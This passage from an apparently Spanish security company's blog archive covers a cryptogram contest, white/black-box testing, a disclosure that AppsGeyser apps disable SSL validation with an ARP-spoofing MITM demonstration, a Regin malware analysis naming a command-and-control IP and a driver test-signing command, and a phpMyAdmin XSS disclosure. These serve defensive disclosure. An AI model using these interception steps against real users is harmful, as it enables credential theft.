necesario conocer la clave empleada. En este caso, es posible utilizar un poco la imaginación o mejor aún, hacer una lista de claves candidatas basada en los productos de 11Paths. En esta ocasión, la clave criptográfica era nuestro querido LATCH. CRIPTOGRAMA: C 1 U Q T M O 6 G Z CLAVE: L A T C H L A T C H TEXTO: 1 1 B O M B O N E S Veamos un par de ejemplos de cómo obtener la solución (11BOMBONES): La primera letra del criptograma C tiene la posición 2 en el alfabeto. La primera letra en la clave la L tiene la posición 11 en el alfabeto. La primera letra del texto sería la presente en el alfabeto en la posición 2-11=-9 (si el valor es negativo continuamos contando desde el final del alfabeto), es decir el carácter 1 (posición 27 o -9). La segunda letra del criptograma 1 (posición 27) y clave A (posición 0) da lugar al carácter en clave 1 (posición 27-0). Y así, sucesivamente. Pasaron varios días hasta que recibimos la respuesta ganadora, concretamente el jueves 08 de enero. Como ya anunciamos, sólo podía haber un ganador y ese sería quién además de adivinar la respuesta, fuera el primero en enviárnosla: And the winner is…¡Ángel Goitia!¡Enhorabuena! Los 11 bombones son para ti. Nos pondremos en contacto contigo en los próximos días vía email para indicarte cómo recoger tu premio. ¡Feliz viernes!
9 de enero de 2015
QA: Pruebas para asegurar la calidad del producto software (III)
Tal y como se había comentado con anterioridad, las pruebas de calidad sobre una aplicación informática se pueden dividir siguiendo diversos criterios, y uno de ellos es según la accesibilidad que se tenga sobre los elementos del sistema a evaluar. Es allí donde entran en juego dos conceptos muy conocidos por los profesionales de seguridad informática: caja blanca y caja negra... incluso la caja gris como punto intermedio entre ellas. Fuente: http://www.softwaretestingnet.com/2009/10/black-box-and-white-box-testing.html Pruebas de caja blanca Cuando nos referimos a pruebas de caja blanca hablamos de pruebas que están fuertemente ligadas al código fuente. Para realizar la batería de test en primer lugar habremos inspeccionado el código fuente y analizado todos los posibles flujos de ejecución de la aplicación, cerciorándonos en cada caso de que los resultados obtenidos sean los esperados. Es por esto que se dice que estas pruebas están fuertemente ligadas en una implementación en concreto, ya que si ésta se modifica, por regla general las pruebas tendrán que ser modificadas y/o rediseñadas. Fuente: http://www.calidadysoftware.com/testing/pruebas_unitarias1.php Como puede apreciarse en la imagen de arriba, los "testers" tendremos la posibilidad de observar el funcionamiento de los diversos componentes (óvalos) y probarlos adecuadamente, además de poder verificar las dependencias, interfaces y flujos de comunicación existentes entre ellos (flechas). Llegado a este punto suele surgir una pregunta... ¿Quién debería encargarse de hacer las pruebas? Lo más recomendable sería que sea la persona del equipo que mejor conozca el lenguaje de programación en el que se haya desarrollado el proyecto, además que debería estar familiarizado con las herramientas de depuración y pruebas útiles para ese entorno. En la actualidad existen una gran cantidad de herramientas que apoyan la labor del analista de pruebas, como por ejemplo, las soluciones incluidas en el paquete "Mercury Interactive Software Test Tools" u otras como las bibliotecas de JUnit, NUnit para C#, CPPUnit, etc. Esto deja en claro que dependiendo del lenguaje que se esté utilizando se pueden conseguir herramientas nativas o adaptadas a dicho lenguaje y además estas herramientas facilitan en gran medida el desarrollo de pruebas, la elaboración de casos de prueba, seguimiento de errores, etc., de forma que se pueda llevar un proceso lo más ordenado y completo posible. ¿A qué niveles se aplica? Son diferentes los criterios que se toman al respecto, ya que en realidad se puede aplicar a cualquier nivel (unidad, integración o sistema)... Sin embargo, comúnmente se suele aplicar modularmente a unidades funcionales con el objetivo de inspeccionar y verificar el comportamiento de cada uno de los elementos antes de empezar su integración dentro de un producto software como tal. Una vez que se tienen probados todos los elementos por separado, se pasa a realizar una prueba más general después de haber pasado una fase de integración, donde se comprueban los flujos existentes entre las diferentes unidades funcionales. Este criterio vuelve a ser válido si se tratan de sistemas completos donde se busca en código abierto comprobar la comunicación entre todos los subsistemas que componen un proyecto. ¿Cómo se aplicaría esto a un escenario real? Si quisiéramos brindar un caso práctico sobre el uso de pruebas de caja blanca, podríamos pensar en un sistema de revisión de código como Gerrit (sistema de integración continua). Ciclo de control de desarrollo de software con caja blanca Si tenemos un ciclo de desarrollo donde los programadores van incluyendo cambios sobre un proyecto base, tarde o temprano surgirá la necesidad de que exista de por medio una persona que evalúe la calidad y validez del código que se está subiendo al repositorio principal. No está de más recordar que esta persona tendrá acceso al código fuente que va a auditar en cada momento. En la figura anterior, hemos enmarcado en azul la acción que realizaría un tester para realizar una inspección de código tras recibir una nueva actualización por parte de los desarrolladores. En este caso, si el evaluador considera que el código es correcto y funcional aceptará el cambio y este pasará a ser incluido como parte del proyecto final (en un repositorio centralizado). En caso contrario se pedirá una rectificación o "patch set" para que el cambio que se pretendía introducir sea válido tras la corrección (no se puede dar por válido un cambio tras una rectificación sin antes volver a analizar el código fuente del cambio). Otro entorno donde comúnmente se utilizan las pruebas de caja blanca es en las auditorías de seguridad de una aplicación web, donde el cliente proporciona el código fuente de su aplicación con el fin de que encuentre el mayor número de fallos. En estos casos lo primero que se hace es comprobar el uso de buenas prácticas de seguridad incluidas en diversas guías de seguridad y manuales especializados, ejecución de herramientas automatizadas para el escaneo de vulnerabilidades... Tras esto también se realiza un procedimiento manual para verificar la validación de campos de entrada, control de usuarios, controlar la ejecución de código externo, filtraciones de información interna a través de metadatos o comentarios en el código fuente (con especial atención a cuando se hace uso de código de terceros), etc. Pruebas de caja negra Su definición es un poco más sencilla, ya que conociendo una función específica para la que fue diseñado el producto, se pueden diseñar pruebas que demuestren que esa función está bien realizada solamente a través de su interfaz software, panel de ejecución, etc. Es decir, de la función que desempeña la aplicación, actuando sobre ella como una caja negra, proporcionando unas entradas y estudiando las salidas para ver si concuerdan con las esperadas. ¿Cómo se aplicaría esto a un escenario real? Tal y como se mencionó en la anterior entrada, las fábricas de pruebas son empresas especializadas en confeccionar conjuntos de test con el fin de evaluar la calidad de la aplicación que está probando. En la mayoría de los casos estas empresas solamente tienen acceso al producto final, por lo que inspeccionan todo desde afuera. Es muy interesante este punto de vista, ya que además de centrarse especialmente en el ámbito funcional se tiende a buscar indicios de mal funcionamiento a nivel de caja blanca, es decir, mala práctica a la hora del diseño. Por ejemplo inspeccionar el comportamiento "responsive", evaluar la salida tras determinadas entradas en campos de formularios o parámetros de la aplicación (algo muy utilizado en el entorno de seguridad informática, sobre todo en el sector profesional en el hacking ético), etc. Pruebas de caja gris Algunos analistas consideran que solamente existen los dos tipos de cajas previamente mencionados, pero algunos pocos consideramos la posibilidad de incluir en la clasificación un tercer tipo de caja que, en resumen, será una mezcla de los dos anteriores como si de una situación intermedia se tratara. En este caso utilizaremos los casos de prueba generados para los test de caja blanca, pero en un escenario de un testing de caja negra, es decir, vamos a realizar pruebas sobre elementos que a priori podrían tener problemas por la forma en la que se ha realizado la fase de integración, la complejidad de los métodos o patrones de diseño elegidos, implementación de código de terceros, etc. Y tras lo cual vamos a analizar los resultados obtenidos. En la próxima oportunidad entraremos de lleno en las pruebas unitarias, que son consideradas un punto clave a la hora de desarrollar. Se trata de pruebas que se realizan paralelamente al desarrollo y son creadas por los propios programadores como parte de un buen proceso de desarrollo de aplicaciones informáticas. Jhonattan Fiestas jhonattan.fiestas@11paths.com
30 de diciembre de 2014
Nuestro criptograma tiene premio
Si no te ha tocado el gordo, no te han dado cesta en tu empresa, y tampoco esperas grandes regalos estas Navidades, no te preocupes…¡nuestro criptograma tiene premio! Sé el primero en descifrar su mensaje oculto y ponte en contacto con nosotros en contact@support.elevenpaths.com para recoger el premio. ¿Aceptas el reto?
23 de diciembre de 2014
5.500 apps potencialmente vulnerables a ataques de Man in the Middle en Google Play
Se ha descubierto que AppsGeyser, un creador de aplicaciones "a golpe de clic", desactiva la comprobación de certificados SSL en sus aplicaciones. Un atacante en la misma red local que un usuario que utilice estas aplicaciones, podrá inyectar cualquier página cuando navega desde las apps afectadas, o bien ver y modificar webs que deberían estar protegidas. Este generador es muy popular y (según ellos mismos) se han instalado mil millones de apps. Existen más de 5.500 aplicaciones suyas en estos momentos en Google Play. Veamos los detalles del fallo, con los matices necesarios. Página principal de AppsGeyser AppsGeyser es un servicio que facilita la creación de apps de Android "a golpe de clic", basadas en un contenido web. Literalmente, permite crear programas en tres pasos, de la forma más sencilla, y así llevar a una app la experiencia web de una página. Este tipo de aplicaciones introducen riesgos de los que ya hemos hablado, pues el programador no controla el código que se inyecta, y puede desencadenar en efectos no deseados en la seguridad del usuario. En este caso, AppsGeyser ha introducido deliberadamente una función que desactiva la comprobación de la validez de certificados SSL en todas las aplicaciones creadas desde su plataforma. Esto quiere decir que cualquier navegación realizada desde una aplicación creada con AppsGeyser, puede ser interceptada, redirigida, falseada... En ningún momento se validará el certificado del servidor remoto. Para que el ataque tenga éxito, el atacante solo tiene que encontrarse en la misma red local que la víctima. Acceder a su tráfico a través de cualquier técnica (ARP Spoofing, tener el control de un proxy, del gateway...) y observar el tráfico generado desde las apps creadas con AppsGeyser. Si un usuario de una app de este tipo visita una web HTTPS, el atacante solo tendría que introducir su propia página firmada con cualquier certificado, y la víctima no notaría nada extraño. Sería el phishing perfecto. O situarse en medio de la navegación entre una web segura y la víctima. Aun así, si no visita ninguna página explícitamente con HTTPS, podría redirigirla. Por ejemplo, si una app de AppsGeyser visita una página de publicidad, el atacante podría redirigirle a una supuesta página de Facebook, Twitter, etc. y preguntar por las credenciales en cualquier momento. 5.500 aplicaciones vulnerables Utilizando Path5, la herramienta de investigación, correlación y monitorización de mercados de ElevenPaths, hemos podido comprobar que existen en estos momentos 5.532 aplicaciones creadas y activas con AppsGeyser en Google Play. Durante este año, se han subido unas 7000, lo que da una idea de su popularidad. Existe incluso un navegador creado con AppsGeyser que sirve para visitar Facebook, Amazon, Twitter... de una forma totalmente insegura. Algunos antivirus ya detectaban desde hace tiempo estas aplicaciones como badware, independientemente de qué hiciesen. Ahora se comprueba que tenían buenos motivos para hacerlo. Un navegador de accesos directos a páginas populares, creado con AppsGeyser Si bien muchas apps son meros entretenimientos, existen instituciones y empresas serias que han utilizado este método para crear su app. Incluso aplicaciones muy populares y descargadas. Existen unas 50 apps creadas con esta plataforma, que superan las 100.000 descargas. Puede que no sean vulnerables todas y cada una, pero es poco probable. Para no serlo, el programador original podría añadir código para activar de nuevo la desactivación de SSL realizada por AppsGeyser. Al tratarse de un perfil de usuario que ha preferido delegar la creación de la app a un tercero, vemos poco probable que baje al nivel técnico necesario para solucionarlo. Además, AppsGeyser no avisa de que está realizando esta desactivación de la comprobación. ¿Por qué desactivar SSL? Sospechamos que para facilitar la vida en el caso de que el creador de la app utilice certificados autofirmados para su web, o certificados que no pueden ser validados por el sistema. AppsGeyser se ahorra así quejas en su sistema de soporte de usuarios creadas con su sistema en los que existe "un error de validación SSL". AppsGeyser desactiva toda comprobación y evita problemas para su soporte técnico, pero pone en riesgo a cualquier usuario de sus aplicaciones. Prueba de concepto Valga como prueba de concepto que permite observar el tráfico cifrado esta demostración de un ataque MITM contra una aplicación de AppsGeyser (https://play.google.com/store/apps/details?id=com.SantiniLabsWebBrowser). El atacante tendría que habilitar IP forwarding y redirigir el tráfico HTTP y HTTPS a un webproxy configurado en la máquina. Para conseguir el ataque de hombre en el medio, se realiza arp-spoofing sobre el dispositivo (aunque podría utilizarse cualquier otra técnica). La víctima inicia sesión en Facebook desde el navegador incluido en la app: El tráfico queda capturado, aunque al usuario le parezca cifrado, puesto que en realidad todo se está realizando con el certificado no confiable del webproxy: El usuario ni siquiera tendría la oportunidad en este caso de comprobar el certificado desde ese navegador, puesto que la aplicación no lo permite. Detalles técnicos Técnicamente, el fallo es muy sencillo. Tomemos como ejemplo ese navegador creado con AppsGeyser, aunque el comportamiento sería el mismo en todas las aplicaciones de AppsGeyser en las que no se haya arreglado explícitamente la desactivación. En el método onCreate(…) de la actividad de inicio, tenemos el siguiente código: La primera línea destacada, guarda en el atributo mStartupScreenViewContainer el FrameLayout startupScreenContainer que veremos cuando se arranque la aplicación. La segunda, crea un controlador desde el FrameLayout anterior según el siguiente código: A su vez, la clase StartupScreenController tiene los siguientes atributos: BrowserWebView será el encargado de presentar las páginas web. Para esto necesitará hacer uso de un objeto WebViewClient que se establece en la construcción de StartupScreenController: Destacamos de este código cómo se recupera el BrowserWebView (en el layout de la actividad de inicio) y cómo se asigna como WebViewClient la instancia del objeto FullScreenBannerWebViewClient. Como vemos, la clase hereda de SimpleWebViewClient: Que a su vez hereda de WebViewClient, el cual según la documentación de la API de Android dispone del siguiente método: Y este método es sobrescrito en SimpleWebViewClient con el siguiente código, invalidando así el comportamiento de denegación de carga de la página Web en caso de encontrarse con un certificado SSL inválido: Las conexiones en riesgo dentro de las apps, serían pues las que se hagan desde objetos que hereden de SimpleWebViewClient y BrowserWebViewClient, y siempre que no sobrescriban el comportamiento de onReceivedSslError con un paramSslErrorHandler.cancel(). Miguel Ángel García miguelangel.garcia@11paths.com Sergio de los Santos ssantos@11paths.com
22 de diciembre de 2014
5.500 apps potentially vulnerable to Man in the Middle attacks in Google Play
It has been discovered than AppsGeyser, an app creator "with just a few clicks", deactivates the SSL certificate validation in its apps. An attacker on the same network as the user running these apps, will be able to inject any page when browsing from the affected apps, or view and modify webs that should be protected. This app generator is very popular and (as they show in their own web, there have been installed almost a thousand million apps). There are 5500 AppsGeyser apps in this moment in Google Play. Let's analyze the problem, and its details. AppsGeyser main website AppsGeyser is a service that eases the creation of Android apps with just a few clicks. Literally, it allows users to create apps in three simple steps, so the web experience is translated to an app. This kind of applications introduce risks we have already talked about, since de programmer does not control the code and it may introduce unwanted security vulnerabilities. In this case, AppsGeyser has deliberately introduced a function that disables the SSL certificate validation of HTTPS traffic in all apps developed from this platform. This vulnerability means that any navigation from an app created by AppsGeyser may be intercepted, forwarded, faked... No certificate from the remote server will be validated. In order to be successful, the attacker has to be on the same local network as the victim. Then the attacker needs to access the victim’s traffic with any known technique (ARP spoofing, proxy control, gateway...) and analyze the traffic generated from any of the apps created with AppsGeyser. If an user of these apps visits an HTTPS website, the attacker would just have to introduce his own web signed with any certificate, and the victim would not notice anything. It would be like the perfect phishing. Or intercepting traffic between the victim and a secure website. Even if the victim does not explicitly visits an HTTPS webpage, the attacker could redirect him. For example, if an AppsGeyser apps visits some ads, the attacker could forward the user to a fake Facebook, Twitter, etc. webpage and ask for his password in any moment. 5.500 vulnerable apps By using Path5, ElevenPaths’s app markets monitorization, correlation and research product, we have been able to detect 5.532 AppsGeyser apps created and still active on Google Play. During this year, more than 7.000 have been in this official platform, what confirms its popularity. There is even a browser developed with AppsGeyser that claims to be a tool to easily visit Twitter, Amazon, Facebook... in a totally insecure way. Some antivirus already detected AppsGeyser apps as badware, no matter the app’s features.. Now it is confirmed that they have good reasons to do it. A browser with direct links to popular pages, created with AppsGeyser There are some serious institutions and companies that have used this method to create its app. Even very popular apps with hundreds of thousands of downloads. There are about 50 apps created with this platform that have been downloaded more than 100.000 times. Maybe not every single one of them is vulnerable, but we have our doubts. In order to avoid being vulnerable, the original developer should have to add or remove the SSL explicit deactivation made by AppsGeyser. The vast majority of developers that have delegated the development of an app to a third party, it is not very likely they have the needed technical level for solving it. Moreover, AppsGeyser does not tell the developer that is invalidating the SSL check. Why deactivating SSL? We think that is has been done to make everything easier for the creator using autosigned certificates for his web, or certificates that can not be validated by the system. AppsGeyser saves support incidents in its support system. Users will never see a "SSL validation error" with their apps. AppsGeyser disables SSL certificate validation and then they avoid problems to their support department, but jeopardizes any user of their apps. Proof of concept This proof of concept shows a MITM attack against an AppsGeyser app (https://play.google.com/store/apps/details?id=com.SantiniLabsWebBrowser) that allows to get encrypted traffic. The attacker has to enable IP forwarding and redirect HTTP AND HTTPS traffic to a webproxy in this machine. Then he needs to launch an ARP spoofing attack (although any other technique would work). The victim opens a Facebook session from the browser in the app. The traffic is captured, although the user thinks is encrypted, since actually all is done with the non-trusted certificate in the webproxy: The user would not be able to check the certificate from the browser, because the app does not allow this functionality. Technical details Technically, the failure is easy to spot. For example, we can have a look to the code from this browser created with AppsGeyser. It would be the same in any app created with this third party that have not explicitly fixed the vulnerability. In the onCreate(…) method in the initial activity, we can find the following code snippet: The first highlighted line, stores in the mStartupScreenViewContainer attribute the FrameLayout startupScreenContainer , that we will see when the app is launched. The second line, creates a controller from the FrameLayout with this code: StartupScreenController class contains these attributes: BrowserWebView will be the one in charge of showing web pages. To get it, it will need to use a WebViewClient object, established when building StartupScreenController: You can see highlighted in this code, how BrowserWebView is recovered (in the initial activity layout) and how the WebViewClient is assigned as an instance of FullScreenBannerWebViewClient object. As we can see, the class inherits from SimpleWebViewClient: That in turn, inherits from WebViewClient, that, according to the Android API documentation, has the following method: And this method is overwritten in SimpleWebViewClient with the following code, so, when an invalid SSL certificate is found, the page is still loaded with no warnings. So, risky connections inside the apps, would be the ones from the objects that inherit from SimpleWebViewClient and BrowserWebViewClient. and provided that they do not overwrite onReceivedSslError behavior with paramSslErrorHandler .cancel(). Miguel Ángel García miguelangel.garcia@11paths.com Sergio de los Santos ssantos@11paths.com
22 de diciembre de 2014
Una muestra de Regin estaba firmada con un certificado inválido
De nuevo, poco se puede aportar sobre Regin, ("el nuevo Stuxnet") sobre qué es y cómo funciona. Lo cierto es que varias veces se ha utilizado ese calificativo para amenazas profesionales muy dirigidas, pero pocas veces se está tan cerca. Veamos algunas curiosidades técnicas sobre Regin. Desde 2010 en el que apareció un la primera "ciberarma", varias veces se ha hablado de "el nuevo Stuxnet", cada vez que se anunciaba malware de características muy avanzadas. Lo cierto es que se han descubierto muchas amenazas similares, todas con sus cualidades más o menos avanzadas en comparación con el "primero" que causó estupor. A pesar de que pocos podrán superar a Stuxnet en su capacidad para explotar vulnerabilidades (sabía explotar hasta cuatro vulnerabilidades desconocidas previamente para Windows, y eso vale mucho dinero), parece que otros le superan en la capacidad de pasar desapercibidos. Regin, con su peculiar uso del registro y su infección "por fases" es sin duda un buen ejemplo de inteligencia en este campo. También en su fórmula para espiar GSM. Veamos otros aspectos interesantes. Certificados... todo por defecto Si bien Stuxnet usaba certificados válidos robados y TheFlame sorprendió aún más a todos con la generación de c ertificados válidos de Microsoft aprovechando una debilidad en su infraestructura PKI... Regin cojea en este sentido. Para cubrir su "primera etapa" en sistemas de 64 bits, Regin utiliza ejecutables firmados. Podría pensarse que se firman para dar credibilidad al fichero e incitar a que el usuario víctima lance el ejecutable... pero luego veremos que no es así. Los certificados son falsos, creados a nombre de "Microsoft Corporation" y "Broadcom Corporation", el 25 de noviembre de 2011. También los ficheros se firmaron y se contrafirmaron en ese momento. Uno de los certificados usados por Regin La contrafirma sirve para que un tercero verifique: que el hash del fichero existía en el momento de la contrafirma; que es posterior a la creación del certificado; y que fue creado durante su validez. Así, aunque el certificado caduque, gracias a la contrafirma, la firma del fichero podrá considerarse válida. Para contrafirmar se pueden usar servidores de cualquier CA que disponga de este servicio. A esta le llega una petición de contrafirma desde donde se esté firmando. Al tratarse de Microsoft en este caso, revisando los logs podrían saber desde dónde se solicitó la contrafirma de ese fichero... si es que no se ocultaron. Con respecto a los certificados, también cabe destacar que los atacantes hicieron algo poco elegante. Puesto que los certificados eran inventados, no los enviaron a firmar por una CA, sino que tenían que crear una CA propia o firmarlos ellos mismos. Para que los certificados fueran válidos en la máquina de las víctimas, estas debían confiar en esa CA, o sea, estar en su listado de certificados raíz de confianza. Regin inyectaba este certificado de CA falso en el manejador de certificados de Windows. Esto implica que, antes de lanzar ese ejecutable firmado, ya confiaba en tener cierto poder sobre la máquina (primero debían poder ejecutar algo para meter el certificado en la lista). Esto resulta cuando menos curioso, y se deduce que existe una "primera etapa antes de la primera etapa" que debe ser la de "infección" (probablemente a través de alguna vulnerabilidad). Sin embargo, una de las muestras, resulta especialmente peculiar en este sentido. Certificado raíz y hoja real de una muestra de Regin "Root Agency" es algo muy característico de la herramienta makecert.exe de Windows, que crea con ese emisor un certificado si se dejan todos sus valores por defecto. También es muy característico porque todos los creados por defecto caducan el 1 de enero de 2040. Es muy sencillo reproducir estos valores: Comando para generar un certificado completamente por defecto en Windows. Muy parecido al de Regin En la muestra, el certificado hoja (emitido por "Root Agency" pero sin valor en su CN) es del 3 de diciembre de 2009, y el raíz, el 28 de mayo de 1996. Algo interesante (como también apuntaba Didier Stevens), es que este último certificado es un viejo conocido: FEE449EE0E3965A5246F000E87FDE2A065FD89D4. Los Windows lo tienen en su carpeta de entidades intermedias de confianza, de forma predeterminada, desde hace años... y ya no es válido. Desde mediados de 2012, Microsoft publicó una actualización que invalida los certificados que usen claves RSA de longitud 512. Este certificado, además, está validado usando MD5 (no en vano fue creado en 1996) por lo que es inválido en todos los Windows. ¿Por qué se sigue distribuyendo en cada sistema operativo? ¿Por qué un certificado inválido? Lo que se deduce es que los atacantes crearon con makecert.exe, un certificado el 3 de diciembre de 2009, sin nombre en su CN, pero sin autofirmar. Con esto, lo que consiguieron es que Windows lo firmase con FEE449EE0E3965A5246F000E87FDE2A065FD89D4. Desde 2012, se observa que Windows envía un mensaje de que no se puede garantizar la integridad del certificado. Pare recrear lo que hicieron los creadores de Regin, es tan sencillo como hacer esto: Recreación para crear el certificado que firmaría una muestra de Regin Extraña también el uso de un nombre CN (Common Name) "en blanco", cuando en otras muestras han usado algo más llamativo como "Microsoft Corporation". Lo realmente curioso, es que en 2009, este certificado firmado tampoco era válido, pero por otras razones. Si bien por entonces se aceptaban certificados de 512 bits y con MD5, el problema es que este certificado está en certificados de "confianza intermedia" y no en "emisoras raíz de confianza". Por ejemplo, en un sistema sin la actualización de Windows que invalida los certificados con RSA de 512 bits (previo a 2012), este es el mensaje que aparece. Certificado usado en Regin, antes de ser inválido en Windows después de una actualización de 2012 Entonces, ¿para qué sirve? Al parecer, Windows utiliza estos certificados en modo "Test de firma" del sistema operativo. El modo de test significa que cargará cualquier driver en el sistema, aunque no esté convenientemente firmado. Para entrar en el modo "test de firma", es necesario modificar el BOOT.INI. En Windows Vista y posterior será así: bcdedit.exe -set TESTING ON y reiniciar. Aparecerá una marca de agua en el escritorio. Cuando Windows se distribuye en modo "Solo para pruebas" ("For test purposes only"), este certificado actúa junto con otro certificado raíz muy conocido cuyo nombre lo dice todo... pero que no se encuentra en los Windows por defecto, solo en los que son "para pruebas": Certificado Raíz de pruebas de Windows Pero todo esto no es problema para los atacantes. Si alguien infectado lanzó el programa de forma "manual", sin elevar privilegios, no recibió ninguna alerta por estar firmado por un certificado inválido, ni en 2009 ni en 2012. Solo una comprobación "manual" o lanzarlo con UAC, daría una pista de un certificado inválido. También lo hubiera evitado una previa y correcta configuración de Authenticode y reglas de ejecución adecuadas. ¿Por qué lo hicieron así los creadores de Regin? No existe explicación lógica aparente más que el descuido o que no les parecía algo vital en su objetivo. Pero este certificado no era el único usado en Regin. En otros casos, como ya se ha mencionado, se supone que debía inyectar en el repositorio de certificados de confianza de la víctima un certificado para validar el ejecutable. Pero nadie aclara cómo se hacía. Obviamente, las víctimas también deberían tener totalmente prohibida la instalación por parte de terceros, de certificados de confianza última en un sistema. Desde el punto de vista del malware, los errores cometidos son: Hubiera sido fácilmente detectable ante una auditoría periódica de certificados instalados. Se hubiera podido evitar eliminando los permisos de instalación o limitando la posibilidad de añadir nuevos certificados de confianza. En este caso, los atacantes fueron muy descuidados también al utilizar certificados tan fácilmente identificables. La forma de salir hacia los C&C Esta característica de Regin nada tiene que ver con los certificados, pero queríamos resaltarla. Es sencillamente genial y sin embargo, ha pasado desapercibida. La comunicación con el C&C no era directa. El atacante había preparado sistemas infectados en la red interna de la víctima, que actuaban como "salidas" al C&C, de forma que el atacado no lanzaba tráfico nunca directamente. Pero no solo eso, sino que las rutas de salida e incluso el protocolo usado iban cambiando. Un ejemplo de fichero de configuración: El tráfico va saltando hasta dar con un C&C real, en 203.199.89.80. Los códigos después de la palabra reservada "transport", indican qué protocolo se utiliza. Desde ICMP, hasta SMB, pasando por HTTPS... Creaban redes "virtuales" entre máquinas infectadas para concentrar por ahí el tráfico y que muchas salieran al C&C "todas de una vez". Así se minimiza el tráfico hacia el sistema de control. Esto además desacopla totalmente el tráfico sospechoso entre el infectado y otros sistemas quizás menos vigilados. En ocasiones, usaban la red de la propia compañía para, por ejemplo, salir por otra oficina en otra parte del país, muy lejos de donde se encontraba el sistema infectado. En resumen, Regin lo ha hecho muy bien para pasar desapercibido desde hace muchos años (¿2003?) ,pero desde luego, no gracias al uso de sus certificados (punto fuerte de TheFlame) ni vulnerabilidades desconocidas (punto fuerte de Stuxnet), sino a su instalación "por etapas" y fórmula de contacto con los C&C. Sergio de los Santos ssantos@11paths.com @ssantosv
9 de diciembre de 2014
PhpMyAdmin corrige un XSS detectado por ElevenPaths (CVE-2014-9219)
El pasado 28 de noviembre, durante el desarrollo de un módulo de intrusión sobre el gestor de MySQL PhpMyAdmin por parte del equipo de desarrollo de Faast, se detectó una vulnerabilidad de cross site scripting desconocida hasta el momento en el popular programa. Se ha reportado a los responsables de forma privada y finalmente le han asignado el CVE-2014-9219. Afectaba a todas las versiones de éste producto hasta la fecha. Anuncio y corrección de la vulnerabilidad El equipo de PhpMyAdmin ha actuado con bastante rapidez, y en apenas tres días han solucionado el problema y publicado la nueva versión. La vulnerabilidad (actualmente explotable en cualquier versión inferior a la 4.2.13.1) radica en un mal filtrado en la línea 31 del fichero "url.php", en el que se estaba utilizando incorrectamente la función htmlspecialchars. En la siguiente imagen se observa el parche aplicado en donde se remplaza la función htmlspecialchars por PMA_escapeJsString. Commit 9b2479b7216dd91a6cc2f231c0fd6b85d457f6e2 con la línea corregida Filtrando solamente los caracteres especiales HTML, su explotación resultaba trivial. Además, se evadían las protecciones anti-XSS que implementan los navegadores debido a que el código inyectado era reflejado dentro de un tag "script". Éste tipo de vulnerabilidades son unas de las más comunes en aplicaciones web, y permiten entre otras la obtención de cookies de sesión del usuario atacado, como se muestra en la siguiente imagen. Explotación del XSS Si actualmente en tu organización se está usando alguna versión de PhpMyAdmin, se recomienda actualizar lo antes posible a la última versión (4.2.13.1) o aplicar el parche proporcionado por sus desarrolladores. Adicionalmente también recomendamos el uso de nuestro escáner de vulnerabilidades Faast que por supuesto ya detecta esta vulnerabilidad "de serie". Además, recuerda que disponemos de un plugin específico de Latch para PhpMyAdmin. Toda la información de cómo instalarlo aquí. Manuel Fernández manuel.fernandez@11paths.com
4 de diciembre de 2014
PhpMyAdmin fixes a XSS detected by ElevenPaths (CVE-2014-9219)
On November 28th, while our Faast team was developing an intrusion module for PhpMyAdmin MySQL manager, we detected a new cross site scripting vulnerability not known so far in this popular program. It has been privately reported to the team responsible for PhpMyAdmin security and the CVE-2014-9219 has been assigned. It affected all known versions. Vulnerability and fix announce PhpMyAdmin security team has reacted promptly and in just three days they have fixed the problem and released a new version. The vulnerability (currently exploitable in any version previous to 4.2.13.1) relies in a bad filtering in the "url.php" file. The function htmlspecialchars was being incorrectly used. The div below shows the applied patch where htmlspecialchars function is replaced by PMA_escapeJsString. Commit 9b2479b7216dd91a6cc2f231c0fd6b85d457f6e2 with the fixing line Just filtering HTML special characters, its exploitation was trivial. Besides, i t was possible to bypass anti-XSS protections in browsers, because the injected code was reflexed into a "script" tag. This kind of vulnerabilities are very common in web applications, and allow different attacks, as obtaining session cookies, as shown in the div below. Exploiting the vulnerability If you are using PhpMyAdmin, it is recommended to update as soon as possible to latest version (4.2.13.1) or applying the patch available here. Besides, we recommend using Faast that, of course, already detects this vulnerability. Finally, remember we have a Latch plugin for PhpMyAdmin. All the information about how to install it, is here. Manuel Fernández manuel.fernandez@11paths.com
4 de diciembre de 2014
ElevenPaths e Incibe, ofrecen servicios de ciberseguridad para PYMEs
Últimamente son frecuentes los robos de credenciales a servicios online, lo que supone mucha pérdida para las empresas. Ante este hecho, queremos impulsar el uso de servicios de seguridad entre las Pequeñas y Medianas Empresas españolas y evaluar la utilidad para sus negocios. Por eso, desde ElevenPaths trabajaremos de la mano con Incibe, el Instituto Nacional de Ciberseguridad, para ofrecer a las PYMEs españolas de forma gratuita, la solución de seguridad Latch. Latch permite implementar un pestillo de seguridad en tus servicios online. De esta manera, los usuarios del servicio web de las compañías podrán bloquear fácilmente el acceso a estos servicios desde una sencilla app en el móvil. Por ejemplo, un usuario de una tienda online podrá "dejar el pestillo echado" a su cuenta de acceso a la tienda y "abrirlo" sólo cuando vaya a realizar una compra. Aunque le robaran su usuario y contraseña, nadie podría hacer compras en su nombre. Seguridad online al alcance de las PYMEs Si eres una PYME española, únete al proyecto y obtén gratis durante un año una cuenta de Latch para proteger tu servicio online. Para participar, sigue estos sencillos pasos: Regístrate antes del 30 de noviembre de 2015 y obtén gratis una cuenta de Latch durante un año. Responde a la encuesta que deberás completar en el formulario de registro para que podamos valorar tu experiencia. Para saber más sobre esta iniciativa, visita la web https://estudioherramientas.incibe.es/ Cybercamp 2014 Por otro lado, como ya os contamos hace unos días, este mes se celebra en Madrid, el Cybercamp de Incibe. Desde ElevenPaths impartiremos un taller sobre protección de servicios y sistemas basada en la reducción del tiempo de exposición con Latch. Si quieres inscribirse en los talleres de ElevenPaths en Cybercamp, puedes hacerlo a través de https://cybercamp.es/desarrollos
2 de diciembre de 2014
La tarjeta de coordenadas: una muerte anunciada
